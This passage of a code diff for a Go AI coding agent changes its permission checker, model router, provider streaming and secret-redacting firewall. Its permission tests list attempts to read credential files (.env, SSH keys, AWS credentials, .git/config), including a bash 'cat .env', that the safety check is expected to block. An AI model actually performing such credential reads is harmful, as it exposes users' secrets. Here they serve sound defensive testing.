return fmt.Errorf("%w: safety check blocked access to %q via %s", ErrDenied, pattern, toolName) return fmt.Errorf("%w: safety check blocked access to %q via %s", ErrDenied, pattern, toolName)
} }
} }
@@ -184,18 +244,3 @@ func (c *Checker) checkCompoundCommand(ctx context.Context, info ToolInfo, args
return nil return nil
} }
func (c *Checker) prompt(ctx context.Context, toolName string, args json.RawMessage) error {
if c.promptFn == nil {
// No prompt function — deny by default
return fmt.Errorf("%w: no prompt handler for %s", ErrDenied, toolName)
}
approved, err := c.promptFn(ctx, toolName, args)
if err != nil {
return fmt.Errorf("permission prompt: %w", err)
}
if !approved {
return fmt.Errorf("%w: user denied %s", ErrDenied, toolName)
}
return nil
}

View File

@@ -110,6 +110,30 @@ func TestChecker_AcceptEditsMode(t *testing.T) {
} }
} }
func TestChecker_ElfNilPrompt_FsWriteAllowed(t *testing.T) {
// Elfs use WithDenyPrompt (nil promptFn). Non-destructive fs ops must still
// be allowed so elfs can write files in auto/acceptEdits modes.
c := NewChecker(ModeAuto, nil, nil) // nil promptFn simulates elf checker
// Non-destructive fs.write: allowed
err := c.Check(context.Background(), ToolInfo{Name: "fs.write"}, json.RawMessage(`{"path":"AGENTS.md"}`))
if err != nil {
t.Errorf("elf should be able to write files: %v", err)
}
// Destructive fs op: denied
err = c.Check(context.Background(), ToolInfo{Name: "fs.delete", IsDestructive: true}, json.RawMessage(`{"path":"foo"}`))
if !errors.Is(err, ErrDenied) {
t.Error("destructive fs op should be denied without prompt handler")
}
// bash: denied
err = c.Check(context.Background(), ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"echo hi"}`))
if !errors.Is(err, ErrDenied) {
t.Error("bash should be denied without prompt handler")
}
}
func TestChecker_AutoMode(t *testing.T) { func TestChecker_AutoMode(t *testing.T) {
c := NewChecker(ModeAuto, nil, func(_ context.Context, _ string, _ json.RawMessage) (bool, error) { c := NewChecker(ModeAuto, nil, func(_ context.Context, _ string, _ json.RawMessage) (bool, error) {
return true, nil // approve prompt return true, nil // approve prompt
@@ -148,23 +172,68 @@ func TestChecker_SafetyCheck(t *testing.T) {
// Safety checks are bypass-immune // Safety checks are bypass-immune
c := NewChecker(ModeBypass, nil, nil) c := NewChecker(ModeBypass, nil, nil)
tests := []struct { blocked := []struct {
name string name string
toolName string
args string args string
}{ }{
{"env file", `{"path":".env"}`}, {"env file", "fs.read", `{"path":".env"}`},
{"git dir", `{"path":".git/config"}`}, {"git dir", "fs.read", `{"path":".git/config"}`},
{"ssh key", `{"path":"id_rsa"}`}, {"ssh key", "fs.read", `{"path":"id_rsa"}`},
{"aws creds", `{"path":".aws/credentials"}`}, {"aws creds", "fs.read", `{"path":".aws/credentials"}`},
{"bash env", "bash", `{"command":"cat .env"}`},
} }
for _, tt := range tests { for _, tt := range blocked {
t.Run(tt.name, func(t *testing.T) { t.Run(tt.name, func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: "fs.read"}, json.RawMessage(tt.args)) err := c.Check(context.Background(), ToolInfo{Name: tt.toolName}, json.RawMessage(tt.args))
if !errors.Is(err, ErrDenied) { if !errors.Is(err, ErrDenied) {
t.Errorf("safety check should block: %v", err) t.Errorf("safety check should block: %v", err)
} }
}) })
} }
// Writing a file whose *content* mentions .env (e.g. AGENTS.md docs) must not be blocked.
t.Run("env mention in content not blocked", func(t *testing.T) {
args := json.RawMessage(`{"path":"AGENTS.md","content":"Copy .env.example to .env and fill in the values."}`)
err := c.Check(context.Background(), ToolInfo{Name: "fs.write"}, args)
if err != nil {
t.Errorf("fs.write to safe path should not be blocked by content mention: %v", err)
}
})
}
func TestChecker_SafetyCheck_OrchestrationToolsExempt(t *testing.T) {
// spawn_elfs and agent carry elf PROMPT TEXT as args — arbitrary instruction
// text that may legitimately mention .env, credentials, etc.
// Security is enforced inside each spawned elf, not at the orchestration layer.
c := NewChecker(ModeBypass, nil, nil)
cases := []struct {
name string
toolName string
args string
}{
{"spawn_elfs with .env mention", "spawn_elfs", `{"tasks":[{"task":"check .env config","elf":"worker"}]}`},
{"spawn_elfs with credentials mention", "spawn_elfs", `{"tasks":[{"task":"read credentials file","elf":"worker"}]}`},
{"agent with .env mention", "agent", `{"prompt":"verify .env is configured correctly"}`},
{"agent with ssh mention", "agent", `{"prompt":"check .ssh/config for proxy settings"}`},
}
for _, tt := range cases {
t.Run(tt.name, func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: tt.toolName}, json.RawMessage(tt.args))
if err != nil {
t.Errorf("orchestration tool %q should not be blocked by safety check: %v", tt.toolName, err)
}
})
}
// Non-orchestration tools with the same patterns are still blocked.
t.Run("bash with .env still blocked", func(t *testing.T) {
err := c.Check(context.Background(), ToolInfo{Name: "bash"}, json.RawMessage(`{"command":"cat .env"}`))
if !errors.Is(err, ErrDenied) {
t.Errorf("bash accessing .env should still be blocked: %v", err)
}
})
} }
func TestChecker_CompoundCommand(t *testing.T) { func TestChecker_CompoundCommand(t *testing.T) {
@@ -233,3 +302,26 @@ func TestChecker_SetMode(t *testing.T) {
t.Errorf("mode should be plan after SetMode") t.Errorf("mode should be plan after SetMode")
} }
} }
func TestChecker_ConcurrentSetModeAndCheck(t *testing.T) {
// Verifies no data race between SetMode (TUI goroutine) and Check (engine goroutine).
// Run with: go test -race ./internal/permission/...
c := NewChecker(ModeDefault, nil, nil)
ctx := context.Background()
info := ToolInfo{Name: "bash", IsReadOnly: true}
args := json.RawMessage(`{}`)
done := make(chan struct{})
go func() {
defer close(done)
for i := 0; i < 1000; i++ {
c.SetMode(ModeAuto)
c.SetMode(ModeDefault)
}
}()
for i := 0; i < 1000; i++ {
c.Check(ctx, info, args) //nolint:errcheck
}
<-done
}

View File

@@ -0,0 +1,57 @@
package provider
import (
"context"
"sync"
"somegit.dev/Owlibou/gnoma/internal/stream"
)
// ConcurrentProvider wraps a Provider with a shared semaphore that limits the
// number of in-flight Stream calls. All engines sharing the same
// ConcurrentProvider instance share the same concurrency budget.
type ConcurrentProvider struct {
Provider
sem chan struct{}
}
// WithConcurrency wraps p so that at most max Stream calls can be in-flight
// simultaneously. If max <= 0, p is returned unwrapped.
func WithConcurrency(p Provider, max int) Provider {
if max <= 0 {
return p
}
sem := make(chan struct{}, max)
for range max {
sem <- struct{}{}
}
return &ConcurrentProvider{Provider: p, sem: sem}
}
// Stream acquires a concurrency slot, calls the inner provider, and returns a
// stream that releases the slot when Close is called.
func (cp *ConcurrentProvider) Stream(ctx context.Context, req Request) (stream.Stream, error) {
select {
case <-cp.sem:
case <-ctx.Done():
return nil, ctx.Err()
}
s, err := cp.Provider.Stream(ctx, req)
if err != nil {
cp.sem <- struct{}{}
return nil, err
}
return &semStream{Stream: s, release: func() { cp.sem <- struct{}{} }}, nil
}
// semStream wraps a stream.Stream to release a semaphore slot on Close.
type semStream struct {
stream.Stream
release func()
once sync.Once
}
func (s *semStream) Close() error {
s.once.Do(s.release)
return s.Stream.Close()
}

View File

@@ -18,10 +18,17 @@ type Provider struct {
client *oai.Client client *oai.Client
name string name string
model string model string
streamOpts []option.RequestOption // injected per-request (e.g. think:false for Ollama)
} }
// New creates an OpenAI provider from config. // New creates an OpenAI provider from config.
func New(cfg provider.ProviderConfig) (provider.Provider, error) { func New(cfg provider.ProviderConfig) (provider.Provider, error) {
return NewWithStreamOptions(cfg, nil)
}
// NewWithStreamOptions creates an OpenAI provider with extra per-request stream options.
// Use this for Ollama/llama.cpp adapters that need non-standard body fields.
func NewWithStreamOptions(cfg provider.ProviderConfig, streamOpts []option.RequestOption) (provider.Provider, error) {
if cfg.APIKey == "" { if cfg.APIKey == "" {
return nil, fmt.Errorf("openai: api key required") return nil, fmt.Errorf("openai: api key required")
} }
@@ -44,6 +51,7 @@ func New(cfg provider.ProviderConfig) (provider.Provider, error) {
client: &client, client: &client,
name: "openai", name: "openai",
model: model, model: model,
streamOpts: streamOpts,
}, nil }, nil
} }
@@ -57,7 +65,7 @@ func (p *Provider) Stream(ctx context.Context, req provider.Request) (stream.Str
params := translateRequest(req) params := translateRequest(req)
params.Model = model params.Model = model
raw := p.client.Chat.Completions.NewStreaming(ctx, params) raw := p.client.Chat.Completions.NewStreaming(ctx, params, p.streamOpts...)
return newOpenAIStream(raw), nil return newOpenAIStream(raw), nil
} }

View File

@@ -28,6 +28,7 @@ type toolCallState struct {
id string id string
name string name string
args string args string
argsComplete bool // true when args arrived in the initial chunk; skip subsequent deltas
} }
func newOpenAIStream(raw *ssestream.Stream[oai.ChatCompletionChunk]) *openaiStream { func newOpenAIStream(raw *ssestream.Stream[oai.ChatCompletionChunk]) *openaiStream {
@@ -77,6 +78,7 @@ func (s *openaiStream) Next() bool {
id: tc.ID, id: tc.ID,
name: tc.Function.Name, name: tc.Function.Name,
args: tc.Function.Arguments, args: tc.Function.Arguments,
argsComplete: tc.Function.Arguments != "",
} }
s.toolCalls[tc.Index] = existing s.toolCalls[tc.Index] = existing
s.hadToolCalls = true s.hadToolCalls = true
@@ -91,8 +93,11 @@ func (s *openaiStream) Next() bool {
} }
} }
// Accumulate arguments (subsequent chunks) // Accumulate arguments (subsequent chunks).
if tc.Function.Arguments != "" && ok { // Skip if args were already provided in the initial chunk — some providers
// (e.g. Ollama) send complete args in the name chunk and then repeat them
// as a delta, which would cause doubled JSON and unmarshal failures.
if tc.Function.Arguments != "" && ok && !existing.argsComplete {
existing.args += tc.Function.Arguments existing.args += tc.Function.Arguments
s.cur = stream.Event{ s.cur = stream.Event{
Type: stream.EventToolCallDelta, Type: stream.EventToolCallDelta,
@@ -113,6 +118,29 @@ func (s *openaiStream) Next() bool {
} }
return true return true
} }
// Ollama thinking content — non-standard "thinking" or "reasoning" field on the delta.
// Ollama uses "reasoning"; some other servers use "thinking".
// The openai-go struct drops unknown fields, so we read the raw JSON directly.
if raw := delta.RawJSON(); raw != "" {
var extra struct {
Thinking string `json:"thinking"`
Reasoning string `json:"reasoning"`
}
if json.Unmarshal([]byte(raw), &extra) == nil {
text := extra.Thinking
if text == "" {
text = extra.Reasoning
}
if text != "" {
s.cur = stream.Event{
Type: stream.EventThinkingDelta,
Text: text,
}
return true
}
}
}
} }
// Stream ended — flush tool call Done events, then emit stop // Stream ended — flush tool call Done events, then emit stop

View File

@@ -20,6 +20,10 @@ func unsanitizeToolName(name string) string {
if strings.HasPrefix(name, "fs_") { if strings.HasPrefix(name, "fs_") {
return "fs." + name[3:] return "fs." + name[3:]
} }
// Some models (e.g. gemma4 via Ollama) use "fs:grep" instead of "fs_grep"
if strings.HasPrefix(name, "fs:") {
return "fs." + name[3:]
}
return name return name
} }
@@ -127,6 +131,12 @@ func translateRequest(req provider.Request) oai.ChatCompletionNewParams {
IncludeUsage: param.NewOpt(true), IncludeUsage: param.NewOpt(true),
} }
if req.ToolChoice != "" && len(params.Tools) > 0 {
params.ToolChoice = oai.ChatCompletionToolChoiceOptionUnionParam{
OfAuto: param.NewOpt(string(req.ToolChoice)),
}
}
return params return params
} }

View File

@@ -8,6 +8,15 @@ import (
"somegit.dev/Owlibou/gnoma/internal/stream" "somegit.dev/Owlibou/gnoma/internal/stream"
) )
// ToolChoiceMode controls how the model selects tools.
type ToolChoiceMode string
const (
ToolChoiceAuto ToolChoiceMode = "auto"
ToolChoiceRequired ToolChoiceMode = "required"
ToolChoiceNone ToolChoiceMode = "none"
)
// Request encapsulates everything needed for a single LLM API call. // Request encapsulates everything needed for a single LLM API call.
type Request struct { type Request struct {
Model string Model string
@@ -21,6 +30,7 @@ type Request struct {
StopSequences []string StopSequences []string
Thinking *ThinkingConfig Thinking *ThinkingConfig
ResponseFormat *ResponseFormat ResponseFormat *ResponseFormat
ToolChoice ToolChoiceMode // "" = provider default (auto)
} }
// ToolDefinition is the provider-agnostic tool schema. // ToolDefinition is the provider-agnostic tool schema.

View File

@@ -1,5 +1,7 @@
package provider package provider
import "math"
// RateLimits describes the rate limits for a provider+model pair. // RateLimits describes the rate limits for a provider+model pair.
// Zero values mean "no limit" or "unknown". // Zero values mean "no limit" or "unknown".
type RateLimits struct { type RateLimits struct {
@@ -13,6 +15,31 @@ type RateLimits struct {
SpendCap float64 // monthly spend cap in provider currency SpendCap float64 // monthly spend cap in provider currency
} }
// MaxConcurrent returns the maximum number of concurrent in-flight requests
// that this rate limit allows. Returns 0 when there is no meaningful concurrency
// constraint (provider has high or unknown limits).
func (rl RateLimits) MaxConcurrent() int {
if rl.RPS > 0 {
n := int(math.Ceil(rl.RPS))
if n < 1 {
n = 1
}
return n
}
if rl.RPM > 0 {
// Allow 1 concurrent slot per 30 RPM (conservative heuristic).
n := rl.RPM / 30
if n < 1 {
n = 1
}
if n > 16 {
n = 16
}
return n
}
return 0
}
// ProviderDefaults holds default rate limits keyed by model glob. // ProviderDefaults holds default rate limits keyed by model glob.
// The special key "*" matches any model not explicitly listed. // The special key "*" matches any model not explicitly listed.
type ProviderDefaults struct { type ProviderDefaults struct {

View File

@@ -1,6 +1,9 @@
package router package router
import ( import (
"sync"
"time"
"somegit.dev/Owlibou/gnoma/internal/provider" "somegit.dev/Owlibou/gnoma/internal/provider"
) )
@@ -19,6 +22,9 @@ type Arm struct {
// Cost per 1k tokens (EUR, estimated) // Cost per 1k tokens (EUR, estimated)
CostPer1kInput float64 CostPer1kInput float64
CostPer1kOutput float64 CostPer1kOutput float64
// Live performance metrics, updated after each completed request.
Perf ArmPerf
} }
// NewArmID creates an arm ID from provider name and model. // NewArmID creates an arm ID from provider name and model.
@@ -39,9 +45,38 @@ func (a *Arm) SupportsTools() bool {
return a.Capabilities.ToolUse return a.Capabilities.ToolUse
} }
// ArmPerf holds live performance metrics for an arm. // perfAlpha is the EMA smoothing factor for ArmPerf updates (0.3 = ~3-sample memory).
const perfAlpha = 0.3
// ArmPerf tracks live performance metrics using an exponential moving average.
// Updated after each completed stream. Safe for concurrent use.
type ArmPerf struct { type ArmPerf struct {
TTFT_P50_ms float64 // time to first token, p50 mu sync.Mutex
TTFT_P95_ms float64 // time to first token, p95 TTFTMs float64 // time to first token, EMA in milliseconds
ToksPerSec float64 // tokens per second throughput ToksPerSec float64 // output throughput, EMA in tokens/second
Samples int // total observations recorded
}
// Update records a single observation into the EMA.
// ttft: elapsed time from stream start to first text token.
// outputTokens: tokens generated in this response.
// streamDuration: total time the stream was active (first call to last event).
func (p *ArmPerf) Update(ttft time.Duration, outputTokens int, streamDuration time.Duration) {
p.mu.Lock()
defer p.mu.Unlock()
ttftMs := float64(ttft.Milliseconds())
var tps float64
if streamDuration > 0 {
tps = float64(outputTokens) / streamDuration.Seconds()
}
if p.Samples == 0 {
p.TTFTMs = ttftMs
p.ToksPerSec = tps
} else {
p.TTFTMs = perfAlpha*ttftMs + (1-perfAlpha)*p.TTFTMs
p.ToksPerSec = perfAlpha*tps + (1-perfAlpha)*p.ToksPerSec
}
p.Samples++
} }

View File

@@ -6,6 +6,7 @@ import (
"fmt" "fmt"
"log/slog" "log/slog"
"net/http" "net/http"
"strings"
"time" "time"
"somegit.dev/Owlibou/gnoma/internal/provider" "somegit.dev/Owlibou/gnoma/internal/provider"
@@ -19,6 +20,33 @@ type DiscoveredModel struct {
Name string Name string
Provider string // "ollama" or "llamacpp" Provider string // "ollama" or "llamacpp"
Size int64 // bytes, if available Size int64 // bytes, if available
SupportsTools bool // whether the model supports function/tool calling
ContextSize int // context window in tokens (0 = unknown, use default)
}
// toolSupportedModelPrefixes lists known model families that support tool/function calling.
// This is a conservative allowlist — unknown models default to no tool support.
var toolSupportedModelPrefixes = []string{
"mistral", "mixtral", "codestral",
"llama3", "llama-3",
"qwen2", "qwen-2", "qwen2.5",
"command-r",
"functionary",
"hermes",
"firefunction",
"nexusraven",
"groq-tool",
}
// inferToolSupport returns true if the model name suggests tool/function calling support.
func inferToolSupport(modelName string) bool {
lower := strings.ToLower(modelName)
for _, prefix := range toolSupportedModelPrefixes {
if strings.Contains(lower, prefix) {
return true
}
}
return false
} }
// DiscoverOllama polls the local Ollama instance for available models. // DiscoverOllama polls the local Ollama instance for available models.
@@ -66,6 +94,8 @@ func DiscoverOllama(ctx context.Context, baseURL string) ([]DiscoveredModel, err
Name: m.Name, Name: m.Name,
Provider: "ollama", Provider: "ollama",
Size: m.Size, Size: m.Size,
SupportsTools: inferToolSupport(m.Name),
ContextSize: 32768, // conservative default; Ollama /api/show can refine this
}) })
} }
return models, nil return models, nil
@@ -110,6 +140,8 @@ func DiscoverLlamaCpp(ctx context.Context, baseURL string) ([]DiscoveredModel, e
ID: m.ID, ID: m.ID,
Name: m.ID, Name: m.ID,
Provider: "llamacpp", Provider: "llamacpp",
SupportsTools: inferToolSupport(m.ID),
ContextSize: 8192, // llama.cpp default; --ctx-size configurable
}) })
} }
return models, nil return models, nil
@@ -208,8 +240,14 @@ func RegisterDiscoveredModels(r *Router, models []DiscoveredModel, providerFacto
ModelName: m.ID, ModelName: m.ID,
IsLocal: true, IsLocal: true,
Capabilities: provider.Capabilities{ Capabilities: provider.Capabilities{
ToolUse: true, // assume tool support, will fail gracefully if not // Conservative default: don't assume tool support.
ContextWindow: 32768, // Many small local models (phi, tinyllama, etc.) don't support
// function calling and will produce confused output if selected
// for tool-requiring tasks. Larger known models (mistral, llama3,
// qwen2.5-coder) support tools. Callers can update the arm's
// Capabilities after probing the model template.
ToolUse: m.SupportsTools,
ContextWindow: m.ContextSize,
}, },
}) })
} }

View File

@@ -94,13 +94,27 @@ func (r *Router) Select(task Task) RoutingDecision {
return RoutingDecision{Error: fmt.Errorf("selection failed")} return RoutingDecision{Error: fmt.Errorf("selection failed")}
} }
// Reserve capacity on all pools so concurrent selects don't overcommit.
// If a reservation fails (race between CanAfford and Reserve), return an error.
var reservations []*Reservation
for _, pool := range best.Pools {
res, ok := pool.Reserve(best.ID, task.EstimatedTokens)
if !ok {
for _, prev := range reservations {
prev.Rollback()
}
return RoutingDecision{Error: fmt.Errorf("pool capacity exhausted for arm %s", best.ID)}
}
reservations = append(reservations, res)
}
r.logger.Debug("arm selected", r.logger.Debug("arm selected",
"arm", best.ID, "arm", best.ID,
"task_type", task.Type, "task_type", task.Type,
"complexity", task.ComplexityScore, "complexity", task.ComplexityScore,
) )
return RoutingDecision{Strategy: StrategySingleArm, Arm: best} return RoutingDecision{Strategy: StrategySingleArm, Arm: best, reservations: reservations}
} }
// SetLocalOnly constrains routing to local arms only (for incognito mode). // SetLocalOnly constrains routing to local arms only (for incognito mode).
@@ -190,19 +204,21 @@ func (r *Router) RegisterProvider(ctx context.Context, prov provider.Provider, i
} }
} }
// Stream is a convenience that selects an arm and streams from it. // Stream selects an arm and streams from it, returning the RoutingDecision so the
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, *Arm, error) { // caller can commit or rollback pool reservations when the request completes.
// Call decision.Commit(actualTokens) on success, decision.Rollback() on failure.
func (r *Router) Stream(ctx context.Context, task Task, req provider.Request) (stream.Stream, RoutingDecision, error) {
decision := r.Select(task) decision := r.Select(task)
if decision.Error != nil { if decision.Error != nil {
return nil, nil, decision.Error return nil, decision, decision.Error
} }
arm := decision.Arm req.Model = decision.Arm.ModelName
req.Model = arm.ModelName
s, err := arm.Provider.Stream(ctx, req) s, err := decision.Arm.Provider.Stream(ctx, req)
if err != nil { if err != nil {
return nil, arm, err decision.Rollback()
return nil, decision, err
} }
return s, arm, nil return s, decision, nil
} }

View File

@@ -303,3 +303,199 @@ func TestRouter_SelectForcedNotFound(t *testing.T) {
t.Error("should error when forced arm not found") t.Error("should error when forced arm not found")
} }
} }
// --- Gap A: Pool Reservations ---
func TestRoutingDecision_CommitReleasesReservation(t *testing.T) {
pool := &LimitPool{
TotalLimit: 1000,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal}
decision := r.Select(task)
if decision.Error != nil {
t.Fatalf("Select: %v", decision.Error)
}
// After Select: tokens should be reserved
if pool.Reserved == 0 {
t.Error("Select should reserve pool capacity")
}
// After Commit: reserved released, used incremented
decision.Commit(400)
if pool.Reserved != 0 {
t.Errorf("Reserved = %f after Commit, want 0", pool.Reserved)
}
if pool.Used == 0 {
t.Error("Used should be non-zero after Commit")
}
}
func TestRoutingDecision_RollbackReleasesReservation(t *testing.T) {
pool := &LimitPool{
TotalLimit: 1000,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 500, Priority: PriorityNormal}
decision := r.Select(task)
if decision.Error != nil {
t.Fatalf("Select: %v", decision.Error)
}
decision.Rollback()
if pool.Reserved != 0 {
t.Errorf("Reserved = %f after Rollback, want 0", pool.Reserved)
}
if pool.Used != 0 {
t.Errorf("Used = %f after Rollback, want 0", pool.Used)
}
}
func TestSelect_ConcurrentReservationPreventsOvercommit(t *testing.T) {
// Pool with very limited capacity: only 1 request can fit
pool := &LimitPool{
TotalLimit: 10,
ArmRates: map[ArmID]float64{"a/model": 1.0},
ScarcityK: 2,
}
arm := &Arm{
ID: "a/model",
Capabilities: provider.Capabilities{ToolUse: true},
Pools: []*LimitPool{pool},
}
r := New(Config{})
r.RegisterArm(arm)
task := Task{Type: TaskGeneration, RequiresTools: true, EstimatedTokens: 8000, Priority: PriorityNormal}
// First select should succeed and reserve
d1 := r.Select(task)
// Second concurrent select should fail — capacity reserved by first
d2 := r.Select(task)
if d1.Error != nil && d2.Error != nil {
t.Error("at least one selection should succeed")
}
if d1.Error == nil && d2.Error == nil {
t.Error("second selection should fail: pool overcommit prevented")
}
// Cleanup
d1.Rollback()
d2.Rollback()
}
// --- Gap B: ArmPerf ---
func TestArmPerf_Update_FirstSample(t *testing.T) {
var p ArmPerf
p.Update(50*time.Millisecond, 100, 2*time.Second)
if p.Samples != 1 {
t.Errorf("Samples = %d, want 1", p.Samples)
}
if p.TTFTMs != 50 {
t.Errorf("TTFTMs = %f, want 50", p.TTFTMs)
}
if p.ToksPerSec != 50 { // 100 tokens / 2s
t.Errorf("ToksPerSec = %f, want 50", p.ToksPerSec)
}
}
func TestArmPerf_Update_EMA(t *testing.T) {
var p ArmPerf
p.Update(100*time.Millisecond, 100, time.Second)
p.Update(50*time.Millisecond, 100, time.Second) // faster second response
if p.Samples != 2 {
t.Errorf("Samples = %d, want 2", p.Samples)
}
// EMA: new = 0.3*50 + 0.7*100 = 85
if p.TTFTMs < 80 || p.TTFTMs > 90 {
t.Errorf("TTFTMs = %f, want ~85 (EMA of 100→50)", p.TTFTMs)
}
}
func TestArmPerf_Update_ZeroDuration(t *testing.T) {
var p ArmPerf
p.Update(10*time.Millisecond, 100, 0) // zero stream duration
if p.Samples != 1 {
t.Errorf("Samples = %d, want 1", p.Samples)
}
if p.ToksPerSec != 0 { // undefined throughput → 0
t.Errorf("ToksPerSec = %f, want 0 for zero duration", p.ToksPerSec)
}
}
// --- Gap C: QualityThreshold ---
func TestFilterFeasible_RejectsLowQualityArm(t *testing.T) {
// Arm with no capabilities — heuristicQuality ≈ 0.5, below security_review minimum (0.88)
lowQualityArm := &Arm{
ID: "a/basic",
Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
}
highQualityArm := &Arm{
ID: "b/powerful",
Capabilities: provider.Capabilities{
ToolUse: true,
Thinking: true, // thinking boosts score for security review
ContextWindow: 200000,
},
}
task := Task{
Type: TaskSecurityReview,
RequiresTools: true,
Priority: PriorityHigh,
}
feasible := filterFeasible([]*Arm{lowQualityArm, highQualityArm}, task)
// highQualityArm should be in feasible; lowQualityArm should be filtered
if len(feasible) != 1 {
t.Fatalf("len(feasible) = %d, want 1", len(feasible))
}
if feasible[0].ID != "b/powerful" {
t.Errorf("feasible[0] = %s, want b/powerful", feasible[0].ID)
}
}
func TestFilterFeasible_FallsBackWhenAllBelowQuality(t *testing.T) {
// Only arm available, but quality is low — should still be returned as fallback
onlyArm := &Arm{
ID: "a/only",
Capabilities: provider.Capabilities{ToolUse: true, ContextWindow: 4096},
}
task := Task{Type: TaskSecurityReview, RequiresTools: true}
feasible := filterFeasible([]*Arm{onlyArm}, task)
if len(feasible) == 0 {
t.Error("should fall back to low-quality arm when no better option exists")
}
}

View File

@@ -17,6 +17,23 @@ type RoutingDecision struct {
Strategy Strategy Strategy Strategy
Arm *Arm // primary arm Arm *Arm // primary arm
Error error Error error
reservations []*Reservation // pool reservations held until commit/rollback
}
// Commit finalizes the routing decision, recording actual token consumption.
// Must be called when the request completes successfully.
func (d RoutingDecision) Commit(actualTokens int) {
for _, r := range d.reservations {
r.Commit(actualTokens)
}
}
// Rollback releases the routing decision's pool reservations without recording usage.
// Must be called when the request fails before any tokens are consumed.
func (d RoutingDecision) Rollback() {
for _, r := range d.reservations {
r.Rollback()
}
} }
// selectBest picks the highest-scoring feasible arm using heuristic scoring. // selectBest picks the highest-scoring feasible arm using heuristic scoring.
@@ -121,9 +138,15 @@ func effectiveCost(arm *Arm, task Task) float64 {
return base * maxMultiplier return base * maxMultiplier
} }
// filterFeasible returns arms that can handle the task (tools, pool capacity). // filterFeasible returns arms that can handle the task (tools, pool capacity, quality).
// Arms that pass tool and pool checks but fall below the task's minimum quality threshold
// are collected separately and used as a last resort if no arm meets the threshold.
func filterFeasible(arms []*Arm, task Task) []*Arm { func filterFeasible(arms []*Arm, task Task) []*Arm {
threshold := DefaultThresholds[task.Type]
var feasible []*Arm var feasible []*Arm
var belowQuality []*Arm // passed tool+pool but scored below minimum quality
for _, arm := range arms { for _, arm := range arms {
// Must support tools if task requires them // Must support tools if task requires them
if task.RequiresTools && !arm.SupportsTools() { if task.RequiresTools && !arm.SupportsTools() {
@@ -143,13 +166,26 @@ func filterFeasible(arms []*Arm, task Task) []*Arm {
continue continue
} }
// Quality floor: arms below minimum are set aside, not discarded
if heuristicQuality(arm, task) < threshold.Minimum {
belowQuality = append(belowQuality, arm)
continue
}
feasible = append(feasible, arm) feasible = append(feasible, arm)
} }
// If no arm with tools is feasible but task requires them, // Degrade gracefully: if no arm meets quality threshold, use below-quality ones
// fall back to any available arm (tool-less is better than nothing) if len(feasible) == 0 && len(belowQuality) > 0 {
return belowQuality
}
// If still empty and task requires tools, relax pool checks (last resort)
if len(feasible) == 0 && task.RequiresTools { if len(feasible) == 0 && task.RequiresTools {
for _, arm := range arms { for _, arm := range arms {
if !arm.Capabilities.ToolUse {
continue
}
poolsOK := true poolsOK := true
for _, pool := range arm.Pools { for _, pool := range arm.Pools {
if !pool.CanAfford(arm.ID, task.EstimatedTokens) { if !pool.CanAfford(arm.ID, task.EstimatedTokens) {

View File

@@ -99,17 +99,19 @@ type QualityThreshold struct {
Target float64 // ideal Target float64 // ideal
} }
// DefaultThresholds are calibrated for M4 heuristic scores (range ~00.85).
// M9 will replace these with bandit-derived values once quality data accumulates.
var DefaultThresholds = map[TaskType]QualityThreshold{ var DefaultThresholds = map[TaskType]QualityThreshold{
TaskBoilerplate: {0.50, 0.70, 0.80}, TaskBoilerplate: {0.40, 0.55, 0.70}, // any capable arm works
TaskGeneration: {0.60, 0.75, 0.88}, TaskGeneration: {0.45, 0.60, 0.75},
TaskRefactor: {0.65, 0.78, 0.90}, TaskRefactor: {0.50, 0.65, 0.78},
TaskReview: {0.70, 0.82, 0.92}, TaskReview: {0.55, 0.68, 0.80},
TaskUnitTest: {0.60, 0.75, 0.85}, TaskUnitTest: {0.45, 0.60, 0.75},
TaskPlanning: {0.75, 0.88, 0.95}, TaskPlanning: {0.60, 0.72, 0.82},
TaskOrchestration: {0.80, 0.90, 0.96}, TaskOrchestration: {0.65, 0.75, 0.83},
TaskSecurityReview: {0.88, 0.94, 0.99}, TaskSecurityReview: {0.70, 0.78, 0.84}, // requires thinking or large context window
TaskDebug: {0.65, 0.80, 0.90}, TaskDebug: {0.50, 0.65, 0.78},
TaskExplain: {0.55, 0.72, 0.85}, TaskExplain: {0.40, 0.55, 0.72},
} }
// ClassifyTask infers a TaskType from the user's prompt using keyword heuristics. // ClassifyTask infers a TaskType from the user's prompt using keyword heuristics.

View File

@@ -1,6 +1,7 @@
package security package security
import ( import (
"encoding/json"
"log/slog" "log/slog"
"somegit.dev/Owlibou/gnoma/internal/message" "somegit.dev/Owlibou/gnoma/internal/message"
@@ -96,8 +97,18 @@ func (f *Firewall) scanMessage(m message.Message) message.Message {
} else { } else {
cleaned.Content[i] = c cleaned.Content[i] = c
} }
case message.ContentToolCall:
// Scan LLM-generated tool arguments for accidentally embedded secrets
if c.ToolCall != nil {
tc := *c.ToolCall
scanned := f.scanAndRedact(string(tc.Arguments), "tool_call_args")
tc.Arguments = json.RawMessage(scanned)
cleaned.Content[i] = message.NewToolCallContent(tc)
} else {
cleaned.Content[i] = c
}
default: default:
// Tool calls, thinking blocks — pass through // Thinking blocks — pass through
cleaned.Content[i] = c cleaned.Content[i] = c
} }
} }
@@ -115,12 +126,21 @@ func (f *Firewall) scanAndRedact(content, source string) string {
} }
for _, m := range matches { for _, m := range matches {
f.logger.Warn("secret detected", switch m.Action {
case ActionBlock:
f.logger.Error("blocked: secret detected",
"pattern", m.Pattern,
"source", source,
)
return "[BLOCKED: content contained " + m.Pattern + "]"
default:
f.logger.Debug("secret redacted",
"pattern", m.Pattern, "pattern", m.Pattern,
"action", m.Action, "action", m.Action,
"source", source, "source", source,
) )
} }
}
return Redact(content, matches) return Redact(content, matches)
} }

View File

@@ -1,9 +1,9 @@
package security package security
import ( import (
"fmt"
